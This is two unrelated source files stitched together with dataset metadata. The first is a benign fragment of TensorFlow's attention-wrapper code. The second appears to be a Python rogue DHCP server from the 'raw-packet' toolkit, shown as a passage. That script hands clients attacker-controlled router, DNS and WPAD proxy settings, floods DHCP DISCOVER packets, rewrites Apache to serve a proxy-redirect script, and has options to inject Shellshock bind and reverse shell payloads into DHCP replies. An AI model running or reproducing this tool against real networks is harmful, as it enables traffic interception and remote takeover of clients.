"Hardmax", [logits]): logits = ops.convert_to_tensor(logits, name="logits") if logits.get_shape()[-1].value is not None: depth = logits.get_shape()[-1].value else: depth = array_ops.shape(logits)[-1] return array_ops.one_hot( math_ops.argmax(logits, -1), depth, dtype=logits.dtype) def _compute_attention(attention_mechanism, cell_output, attention_state, attention_layer): """Computes the attention and alignments for a given attention_mechanism.""" alignments, next_attention_state = attention_mechanism( cell_output, state=attention_state) # Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time] expanded_alignments = array_ops.expand_dims(alignments, 1) # Context is the inner product of alignments and values along the # memory time dimension. # alignments shape is # [batch_size, 1, memory_time] # attention_mechanism.values shape is # [batch_size, memory_time, memory_size] # the batched matmul is over memory_time, so the output shape is # [batch_size, 1, memory_size]. # we then squeeze out the singleton dim. context = math_ops.matmul(expanded_alignments, attention_mechanism.values) context = array_ops.squeeze(context, [1]) if attention_layer is not None: attention = attention_layer(array_ops.concat([cell_output, context], 1)) else: attention = context return attention, alignments, next_attention_state class AttentionWrapper(rnn_cell_impl.RNNCell): """Wraps another `RNNCell` with attention. """ def __init__(self, cell, attention_mechanism, attention_layer_size=None, alignment_history=False, cell_input_fn=None, output_attention=True, initial_cell_state=None, name=None): """Construct the `AttentionWrapper`. **NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in `AttentionWrapper`, then you must ensure that: - The encoder output has been tiled to `beam_width` via @{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`). - The `batch_size` argument passed to the `zero_state` method of this wrapper is equal to `true_batch_size * beam_width`. - The initial state created with `zero_state` above contains a `cell_state` value containing properly tiled final state from the encoder. An example: ``` tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch( encoder_outputs, multiplier=beam_width) tiled_encoder_final_state = tf.conrib.seq2seq.tile_batch( encoder_final_state, multiplier=beam_width) tiled_sequence_length = tf.contrib.seq2seq.tile_batch( sequence_length, multiplier=beam_width) attention_mechanism = MyFavoriteAttentionMechanism( num_units=attention_depth, memory=tiled_inputs, memory_sequence_length=tiled_sequence_length) attention_cell = AttentionWrapper(cell, attention_mechanism, ...) decoder_initial_state = attention_cell.zero_state( dtype, batch_size=true_batch_size * beam_width) decoder_initial_state = decoder_initial_state.clone( cell_state=tiled_encoder_final_state) ``` Args: cell: An instance of `RNNCell`. attention_mechanism: A list of `AttentionMechanism` instances or a single instance. attention_layer_size: A list of Python integers or a single Python integer, the depth of the attention (output) layer(s). If None (default), use the context as attention at each time step. Otherwise, feed the context and cell output into the attention layer to generate attention at each time step. If attention_mechanism is a list, attention_layer_size must be a list of the same length. alignment_history: Python boolean, whether to store alignment history from all time steps in the final output state (currently stored as a time major `TensorArray` on which you must call `stack()`). cell_input_fn: (optional) A `callable`. The default is: `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`. output_attention: Python bool. If `True` (default), the output at each time step is the attention value. This is the behavior of Luong-style attention mechanisms. If `False`, the output at each time step is the output of `cell`. This is the beahvior of Bhadanau-style attention mechanisms. In both cases, the `attention` tensor is propagated to the next time step via the state and is used there. This flag only controls whether the attention mechanism is propagated up to the next cell in an RNN stack or to the top RNN output. initial_cell_state: The initial state value to use for the cell when the user calls `zero_state()`. Note that if this value is provided now, and the user uses a `batch_size` argument of `zero_state` which does not match the batch size of `initial_cell_state`, proper behavior is not guaranteed. name: Name to use when creating ops. Raises: TypeError: `attention_layer_size` is not None and (`attention_mechanism` is a list but `attention_layer_size` is not; or vice versa). ValueError: if `attention_layer_size` is not None, `attention_mechanism` is a list, and its length does not match that of `attention_layer_size`. """ super(AttentionWrapper, self).__init__(name=name) rnn_cell_impl.assert_like_rnncell("cell", cell) if isinstance(attention_mechanism, (list, tuple)): self._is_multi = True attention_mechanisms = attention_mechanism for attention_mechanism in attention_mechanisms: if not isinstance(attention_mechanism, AttentionMechanism): raise TypeError( "attention_mechanism must contain only instances of " "AttentionMechanism, saw type: %s" % type(attention_mechanism).__name__) else: self._is_multi = False if not isinstance(attention_mechanism, AttentionMechanism): raise TypeError( "attention_mechanism must be an AttentionMechanism or list of " "multiple AttentionMechanism instances, saw type: %s" % type(attention_mechanism).__name__) attention_mechanisms = (attention_mechanism,) if cell_input_fn is None: cell_input_fn = ( lambda inputs, attention: array_ops.concat([inputs, attention], -1)) else: if not callable(cell_input_fn): raise TypeError( "cell_input_fn must be callable, saw type: %s" % type(cell_input_fn).__name__) if attention_layer_size is not None: attention_layer_sizes = tuple( attention_layer_size if isinstance(attention_layer_size, (list, tuple)) else (attention_layer_size,)) if len(attention_layer_sizes) != len(attention_mechanisms): raise ValueError( "If provided, attention_layer_size must contain exactly one " "integer per attention_mechanism, saw: %d vs %d" % (len(attention_layer_sizes), len(attention_mechanisms))) self._attention_layers = tuple( layers_core.Dense( attention_layer_size, name="attention_layer", use_bias=False, dtype=attention_mechanisms[i].dtype) for i, attention_layer_size in enumerate(attention_layer_sizes)) self._attention_layer_size = sum(attention_layer_sizes) else: self._attention_layers = None self._attention_layer_size = sum( attention_mechanism.values.get_shape()[-1].value for attention_mechanism in attention_mechanisms) self._cell = cell self._attention_mechanisms = attention_mechanisms self._cell_input_fn = cell_input_fn self._output_attention = output_attention self._alignment_history = alignment_history with ops.name_scope(name, "AttentionWrapperInit"): if initial_cell_state is None: self._initial_cell_state = None else: final_state_tensor = nest.flatten(initial_cell_state)[-1] state_batch_size = ( final_state_tensor.shape[0].value or array_ops.shape(final_state_tensor)[0]) error_message = ( "When constructing AttentionWrapper %s: " % self._base_name + "Non-matching batch sizes between the memory " "(encoder output) and initial_cell_state. Are you using " "the BeamSearchDecoder? You may need to tile your initial state " "via the tf.contrib.seq2seq.tile_batch function with argument " "multiple=beam_width.") with ops.control_dependencies( self._batch_size_checks(state_batch_size, error_message)): self._initial_cell_state = nest.map_structure( lambda s: array_ops.identity(s, name="check_initial_cell_state"), initial_cell_state) def _batch_size_checks(self, batch_size, error_message): return [check_ops.assert_equal(batch_size, attention_mechanism.batch_size, message=error_message) for attention_mechanism in self._attention_mechanisms] def _item_or_tuple(self, seq): """Returns `seq` as tuple or the singular element. Which is returned is determined by how the AttentionMechanism(s) were passed to the constructor. Args: seq: A non-empty sequence of items or generator. Returns: Either the values in the sequence as a tuple if AttentionMechanism(s) were passed to the constructor as a sequence or the singular element. """ t = tuple(seq) if self._is_multi: return t else: return t[0] @property def output_size(self): if self._output_attention: return self._attention_layer_size else: return self._cell.output_size @property def state_size(self): """The `state_size` property of `AttentionWrapper`. Returns: An `AttentionWrapperState` tuple containing shapes used by this object. """ return AttentionWrapperState( cell_state=self._cell.state_size, time=tensor_shape.TensorShape([]), attention=self._attention_layer_size, alignments=self._item_or_tuple( a.alignments_size for a in self._attention_mechanisms), attention_state=self._item_or_tuple( a.state_size for a in self._attention_mechanisms), alignment_history=self._item_or_tuple( a.alignments_size if self._alignment_history else () for a in self._attention_mechanisms)) # sometimes a TensorArray def zero_state(self, batch_size, dtype): """Return an initial (zero) state tuple for this `AttentionWrapper`. **NOTE** Please see the initializer documentation for details of how to call `zero_state` if using an `AttentionWrapper` with a `BeamSearchDecoder`. Args: batch_size: `0D` integer tensor: the batch size. dtype: The internal state data type. Returns: An `AttentionWrapperState` tuple containing zeroed out tensors and, possibly, empty `TensorArray` objects. Raises: ValueError: (or, possibly at runtime, InvalidArgument), if `batch_size` does not match the output size of the encoder passed to the wrapper object at initialization time. """ with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]): if self._initial_cell_state is not None: cell_state = self._initial_cell_state else: cell_state = self._cell.zero_state(batch_size, dtype) error_message = ( "When calling zero_state of AttentionWrapper %s: " % self._base_name + "Non-matching batch sizes between the memory " "(encoder output) and the requested batch size. Are you using " "the BeamSearchDecoder? If so, make sure your encoder output has " "been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and " "the batch_size= argument passed to zero_state is " "batch_size * beam_width.") with ops.control_dependencies( self._batch_size_checks(batch_size, error_message)): cell_state = nest.map_structure( lambda s: array_ops.identity(s, name="checked_cell_state"), cell_state) initial_alignments = [ attention_mechanism.initial_alignments(batch_size, dtype) for attention_mechanism in self._attention_mechanisms] return AttentionWrapperState( cell_state=cell_state, time=array_ops.zeros([], dtype=dtypes.int32), attention=_zero_state_tensors(self._attention_layer_size, batch_size, dtype), alignments=self._item_or_tuple(initial_alignments), attention_state=self._item_or_tuple( attention_mechanism.initial_state(batch_size, dtype) for attention_mechanism in self._attention_mechanisms), alignment_history=self._item_or_tuple( tensor_array_ops.TensorArray( dtype, size=0, dynamic_size=True, element_shape=alignment.shape) if self._alignment_history else () for alignment in initial_alignments)) def call(self, inputs, state): """Perform a step of attention-wrapped RNN. - Step 1: Mix the `inputs` and previous step's `attention` output via `cell_input_fn`. - Step 2: Call the wrapped `cell` with this input and its previous state. - Step 3: Score the cell's output with `attention_mechanism`. - Step 4: Calculate the alignments by passing the score through the `normalizer`. - Step 5: Calculate the context vector as the inner product between the alignments and the attention_mechanism's values (memory). - Step 6: Calculate the attention output by concatenating the cell output and context through the attention layer (a linear layer with `attention_layer_size` outputs). Args: inputs: (Possibly nested tuple of) Tensor, the input at this time step. state: An instance of `AttentionWrapperState` containing tensors from the previous time step. Returns: A tuple `(attention_or_cell_output, next_state)`, where: - `attention_or_cell_output` depending on `output_attention`. - `next_state` is an instance of `AttentionWrapperState` containing the state calculated at this time step. Raises: TypeError: If `state` is not an instance of `AttentionWrapperState`. """ if not isinstance(state, AttentionWrapperState): raise TypeError("Expected state to be instance of AttentionWrapperState. " "Received type %s instead." % type(state)) # Step 1: Calculate the true inputs to the cell based on the # previous attention value. cell_inputs = self._cell_input_fn(inputs, state.attention) cell_state = state.cell_state cell_output, next_cell_state = self._cell(cell_inputs, cell_state) cell_batch_size = ( cell_output.shape[0].value or array_ops.shape(cell_output)[0]) error_message = ( "When applying AttentionWrapper %s: " % self.name + "Non-matching batch sizes between the memory " "(encoder output) and the query (decoder output). Are you using " "the BeamSearchDecoder? You may need to tile your memory input via " "the tf.contrib.seq2seq.tile_batch function with argument " "multiple=beam_width.") with ops.control_dependencies( self._batch_size_checks(cell_batch_size, error_message)): cell_output = array_ops.identity( cell_output, name="checked_cell_output") if self._is_multi: previous_attention_state = state.attention_state previous_alignment_history = state.alignment_history else: previous_attention_state = [state.attention_state] previous_alignment_history = [state.alignment_history] all_alignments = [] all_attentions = [] all_attention_states = [] maybe_all_histories = [] for i, attention_mechanism in enumerate(self._attention_mechanisms): attention, alignments, next_attention_state = _compute_attention( attention_mechanism, cell_output, previous_attention_state[i], self._attention_layers[i] if self._attention_layers else None) alignment_history = previous_alignment_history[i].write( state.time, alignments) if self._alignment_history else () all_attention_states.append(next_attention_state) all_alignments.append(alignments) all_attentions.append(attention) maybe_all_histories.append(alignment_history) attention = array_ops.concat(all_attentions, 1) next_state = AttentionWrapperState( time=state.time + 1, cell_state=next_cell_state, attention=attention, attention_state=self._item_or_tuple(all_attention_states), alignments=self._item_or_tuple(all_alignments), alignment_history=self._item_or_tuple(maybe_all_histories)) if self._output_attention: return attention, next_state else: return cell_output, next_state
apache-2.0
-8,393,192,901,681,401,000
40.782821
94
0.670449
false
3.934828
false
false
false
Vladimir-Ivanov-Git/raw-packet
Scripts/DHCP/dhcp_rogue_server.py
1
47873
#!/usr/bin/env python # region Import from sys import path from os.path import dirname, abspath project_root_path = dirname(dirname(dirname(abspath(__file__)))) utils_path = project_root_path + "/Utils/" path.append(utils_path) from base import Base from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw from tm import ThreadManager from scanner import Scanner from sys import exit from argparse import ArgumentParser from ipaddress import IPv4Address from socket import socket, AF_PACKET, SOCK_RAW, htons from os import errno, makedirs from shutil import copyfile from base64 import b64encode from netaddr import IPAddress from time import sleep from random import randint import subprocess as sub # endregion # region Check user, platform and create threads Base = Base() Scanner = Scanner() Base.check_user() Base.check_platform() tm = ThreadManager(3) # endregion # region Parse script arguments parser = ArgumentParser(description='DHCP Rogue server') parser.add_argument('-i', '--interface', help='Set interface name for send reply packets') parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None) parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None) parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None) parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None) parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None) parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None) parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None) parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None) parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None) parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None) parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None) parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None) parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local") parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800) parser.add_argument('-s', '--send_discover', action='store_true', help='Send DHCP discover packets in the background thread') parser.add_argument('-r', '--discover_rand_mac', action='store_true', help='Use random MAC address for source MAC address in DHCP discover packets') parser.add_argument('-d', '--discover_delay', type=float, help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5) parser.add_argument('-O', '--shellshock_option_code', type=int, help='Set dhcp option code for inject shellshock payload, default=114', default=114) parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client') parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client') parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)', default=1234) parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse tcp shell in DHCP client') parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client') parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client') parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen bind shell (default=443)', default=443) parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload') parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload') parser.add_argument('--ip_path', type=str, help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/") parser.add_argument('--iface_name', type=str, help='Set iface name in shellshock payload, default = eth0', default="eth0") parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response') parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets') parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack') parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output') args = parser.parse_args() # endregion # region Print banner if argument quit is not set if not args.quiet: Base.print_banner() # endregion # region Set global variables eth = Ethernet_raw() arp = ARP_raw() ip = IP_raw() udp = UDP_raw() dhcp = DHCP_raw() first_offer_ip_address = None last_offer_ip_address = None network_mask = None target_mac_address = None target_ip_address = None dhcp_server_mac_address = None dhcp_server_ip_address = None router_ip_address = None dns_server_ip_address = None tftp_server_ip_address = None wins_server_ip_address = None wpad_url = None dhcp_discover_packets_source_mac = None free_ip_addresses = [] clients = {} shellshock_url = None domain = None payload = None SOCK = None discover_sender_is_work = False # endregion # region Get your network settings if args.interface is None: Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...") current_network_interface = Base.netiface_selection(args.interface) your_mac_address = Base.get_netiface_mac_address(current_network_interface) if your_mac_address is None: Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!") exit(1) your_ip_address = Base.get_netiface_ip_address(current_network_interface) if your_ip_address is None: Base.print_error("Network interface: ", current_network_interface, " do not have IP address!") exit(1) your_network_mask = Base.get_netiface_netmask(current_network_interface) if your_network_mask is None: Base.print_error("Network interface: ", current_network_interface, " do not have network mask!") exit(1) if args.netmask is None: network_mask = your_network_mask else: network_mask = args.netmask # endregion # region Create raw socket SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) # endregion # region Get first and last IP address in your network first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1) last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1) # endregion # region Set target MAC and IP address, if target IP is not set - get first and last offer IP if args.target_mac is not None: target_mac_address = str(args.target_mac).lower() # region Target IP is set if args.target_ip is not None: if args.target_mac is not None: if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip, "; target IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: target_ip_address = args.target_ip else: Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" + ", for target IP address: ", args.target_ip) exit(1) # Set default first offer IP and last offer IP first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1) last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1) # endregion # region Target IP is not set - get first and last offer IP else: # Check first offer IP address if args.first_offer_ip is None: first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1) else: if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip, "; first IP address in your network: ", first_ip_address) exit(1) else: first_offer_ip_address = args.first_offer_ip # Check last offer IP address if args.last_offer_ip is None: last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1) else: if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip, "; last IP address in your network: ", last_ip_address) exit(1) else: last_offer_ip_address = args.last_offer_ip # endregion # endregion # region Set DHCP sever MAC and IP address if args.dhcp_mac is None: dhcp_server_mac_address = your_mac_address else: dhcp_server_mac_address = args.dhcp_mac if args.dhcp_ip is None: dhcp_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip, "; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: dhcp_server_ip_address = args.dhcp_ip # endregion # region Set router, dns, tftp, wins IP address # Set router IP address if args.router is None: router_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address): Base.print_error("Bad value `--router`: ", args.router, "; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: router_ip_address = args.router # Set DNS server IP address if args.dns is None: dns_server_ip_address = your_ip_address else: if not Base.ip_address_validation(args.dns): Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns) exit(1) else: dns_server_ip_address = args.dns # Set TFTP server IP address if args.tftp is None: tftp_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address): Base.print_error("Bad value `--tftp`: ", args.tftp, "; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: tftp_server_ip_address = args.tftp # Set WINS server IP address if args.wins is None: wins_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address): Base.print_error("Bad value `--wins`: ", args.tftp, "; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: wins_server_ip_address = args.wins # endregion # region Set proxy if args.proxy is not None: # Set variables wpad_url = "http://" + your_ip_address + "/wpad.dat" apache2_sites_available_dir = "/etc/apache2/sites-available/" apache2_sites_path = "/var/www/html/" wpad_path = apache2_sites_path + "wpad/" # Apache2 sites settings default_site_file_name = "000-default.conf" default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w') default_site_file.write("<VirtualHost *:80>\n" + "\tServerAdmin admin@wpad.com\n" + "\tDocumentRoot " + wpad_path + "\n" + "\t<Directory " + wpad_path + ">\n" + "\t\tOptions FollowSymLinks\n" + "\t\tAllowOverride None\n" + "\t\tOrder allow,deny\n" + "\t\tAllow from all\n" + "\t</Directory>\n" + "</VirtualHost>\n") default_site_file.close() # Create dir with wpad.dat script try: makedirs(wpad_path) except OSError: Base.print_info("Path: ", wpad_path, " already exist") except: Base.print_error("Something else went wrong while trying to create path: ", wpad_path) exit(1) # Copy wpad.dat script wpad_script_name = "wpad.dat" wpad_script_src = utils_path + wpad_script_name wpad_script_dst = wpad_path + wpad_script_name copyfile(src=wpad_script_src, dst=wpad_script_dst) # Read redirect script with open(wpad_script_dst, 'r') as redirect_script: content = redirect_script.read() # Replace the Proxy URL content = content.replace('proxy_url', args.proxy) # Write redirect script with open(wpad_script_dst, 'w') as redirect_script: redirect_script.write(content) # Restart Apache2 server try: Base.print_info("Restarting apache2 server ...") sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True) except OSError as e: if e.errno == errno.ENOENT: Base.print_error("Program: ", "service", " is not installed!") exit(1) else: Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`") exit(2) # Check apache2 is running sleep(2) apache2_pid = Base.get_process_pid("apache2") if apache2_pid == -1: Base.print_error("Apache2 server is not running!") exit(1) else: Base.print_info("Apache2 server is running, PID: ", str(apache2_pid)) # endregion # region Set Shellshock option code if 255 < args.shellshock_option_code < 0: Base.print_error("Bad value: ", args.shellshock_option_code, "in DHCP option code! This value should be in the range from 1 to 254") exit(1) # endregion # region Set search domain domain = bytes(args.domain) # endregion # region General output if not args.quiet: Base.print_info("Network interface: ", current_network_interface) Base.print_info("Your IP address: ", your_ip_address) Base.print_info("Your MAC address: ", your_mac_address) if target_mac_address is not None: Base.print_info("Target MAC: ", target_mac_address) # If target IP address is set print target IP, else print first and last offer IP if target_ip_address is not None: Base.print_info("Target IP: ", target_ip_address) else: Base.print_info("First offer IP: ", first_offer_ip_address) Base.print_info("Last offer IP: ", last_offer_ip_address) Base.print_info("DHCP server mac address: ", dhcp_server_mac_address) Base.print_info("DHCP server ip address: ", dhcp_server_ip_address) Base.print_info("Router IP address: ", router_ip_address) Base.print_info("DNS server IP address: ", dns_server_ip_address) Base.print_info("TFTP server IP address: ", tftp_server_ip_address) if args.proxy is not None: Base.print_info("Proxy url: ", args.proxy) # endregion # region Get free IP addresses in local network def get_free_ip_addresses(): global Scanner # Get all IP addresses in range from first to last offer IP address current_ip_address = first_offer_ip_address while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)): free_ip_addresses.append(current_ip_address) current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1) Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...") localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface) for ip_address in localnet_ip_addresses: try: free_ip_addresses.remove(ip_address) except ValueError: pass # endregion # region Add client info in global clients dictionary def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False): if this_client_already_in_dictionary: clients[client_mac_address].update(client_info) else: clients[client_mac_address] = client_info # endregion # region Make DHCP offer packet def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None): if destination_mac is None: destination_mac = "ff:ff:ff:ff:ff:ff" if destination_ip is None: destination_ip = "255.255.255.255" return dhcp.make_response_packet(source_mac=dhcp_server_mac_address, destination_mac=destination_mac, source_ip=dhcp_server_ip_address, destination_ip=destination_ip, transaction_id=transaction_id, your_ip=offer_ip, client_mac=client_mac, dhcp_server_id=dhcp_server_ip_address, lease_time=args.lease_time, netmask=network_mask, router=router_ip_address, dns=dns_server_ip_address, dhcp_operation=2, payload=None) # endregion # region Make DHCP ack packet def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None): if destination_mac is None: destination_mac = "ff:ff:ff:ff:ff:ff" if destination_ip is None: destination_ip = "255.255.255.255" return dhcp.make_response_packet(source_mac=dhcp_server_mac_address, destination_mac=destination_mac, source_ip=dhcp_server_ip_address, destination_ip=destination_ip, transaction_id=transaction_id, your_ip=target_ip, client_mac=target_mac, dhcp_server_id=dhcp_server_ip_address, lease_time=args.lease_time, netmask=network_mask, router=router_ip_address, dns=dns_server_ip_address, dhcp_operation=5, payload=shellshock_url, proxy=bytes(wpad_url), domain=domain, tftp=tftp_server_ip_address, wins=wins_server_ip_address, payload_option_code=args.shellshock_option_code) # endregion # region Make DHCP nak packet def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip): return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address, destination_mac=target_mac, source_ip=dhcp_server_ip_address, destination_ip=requested_ip, transaction_id=transaction_id, your_ip=target_ip, client_mac=target_mac, dhcp_server_id=dhcp_server_ip_address) # endregion # def ack_sender(): # SOCK = socket(AF_PACKET, SOCK_RAW) # SOCK.bind((current_network_interface, 0)) # ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address) # while True: # SOCK.send(ack_packet) # sleep(0.01) # region Send DHCP discover packets def discover_sender(number_of_packets=999999): global discover_sender_is_work discover_sender_is_work = True packet_index = 0 SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) if dhcp_discover_packets_source_mac != your_mac_address: relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface) while packet_index < number_of_packets: try: discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac, client_mac=eth.get_random_mac(), host_name=Base.make_random_string(8), relay_ip=relay_agent_ip_address) SOCK.send(discover_packet) sleep(args.discover_delay) except: Base.print_error("Something went wrong when sending DHCP discover packets!") packet_index += 1 else: while packet_index < number_of_packets: try: discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac, client_mac=eth.get_random_mac(), host_name=Base.make_random_string(8), relay_ip=your_ip_address) SOCK.send(discover_packet) sleep(args.discover_delay) except: Base.print_error("Something went wrong when sending DHCP discover packets!") packet_index += 1 SOCK.close() discover_sender_is_work = False # endregion # region Reply to DHCP and ARP requests def reply(request): # region Define global variables global SOCK global clients global target_ip_address global router_ip_address global payload global shellshock_url global args global discover_sender_is_work # endregion # region DHCP if 'DHCP' in request.keys(): # region Get transaction id and client MAC address transaction_id = request['BOOTP']['transaction-id'] client_mac_address = request['BOOTP']['client-mac-address'] # endregion # region Check this client already in dict client_already_in_dictionary = False if client_mac_address in clients.keys(): client_already_in_dictionary = True # endregion # region DHCP DISCOVER if request['DHCP'][53] == 1: # region Print INFO message Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # endregion # If parameter "Do not send DHCP OFFER packets" is not set if not args.dnsop: # region Start DHCP discover sender if args.send_discover: if not discover_sender_is_work: discover_sender(100) # endregion # If target IP address is set - offer IP = target IP if target_ip_address is not None: offer_ip_address = target_ip_address # If target IP address is not set - offer IP = random IP from free IP addresses list else: random_index = randint(0, len(free_ip_addresses)) offer_ip_address = free_ip_addresses[random_index] # Delete offer IP from free IP addresses list del free_ip_addresses[random_index] if args.broadcast_response: offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address) else: offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address, client_mac_address, offer_ip_address) SOCK.send(offer_packet) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"transaction": transaction_id, "discover": True, "offer_ip": offer_ip_address}, client_already_in_dictionary) # Print INFO message Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address) # endregion # region DHCP RELEASE if request['DHCP'][53] == 7: if request['BOOTP']['client-ip-address'] is not None: client_ip = request['BOOTP']['client-ip-address'] Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"client_ip": client_ip}, client_already_in_dictionary) # print clients # Add release client IP in free IP addresses list if client_ip not in free_ip_addresses: free_ip_addresses.append(client_ip) else: Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"release": True}, client_already_in_dictionary) # print clients # endregion # region DHCP INFORM if request['DHCP'][53] == 8: if request['BOOTP']['client-ip-address'] is not None: client_ip = request['BOOTP']['client-ip-address'] Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # If client IP in free IP addresses list delete this if client_ip in free_ip_addresses: free_ip_addresses.remove(client_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"client_ip": client_ip}, client_already_in_dictionary) # print clients else: Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"inform": True}, client_already_in_dictionary) # print clients # endregion # region DHCP REQUEST if request['DHCP'][53] == 3: # region Set local variables requested_ip = "0.0.0.0" offer_ip = None # endregion # region Get requested IP if 50 in request['DHCP'].keys(): requested_ip = str(request['DHCP'][50]) # endregion # region Print info message Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id), " requested ip: ", requested_ip) # endregion # region Requested IP not in range from first offer IP to last offer IP if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address): Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip, " not in range: ", first_offer_ip_address + " - " + last_offer_ip_address) # endregion # region Requested IP in range from first offer IP to last offer IP else: # region Start DHCP discover sender if args.send_discover: if not discover_sender_is_work: discover_sender(100) # endregion # region Change client info in global clients dictionary # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"request": True, "requested_ip": requested_ip, "transaction": transaction_id}, client_already_in_dictionary) # Delete ARP mitm success keys in dictionary for this client 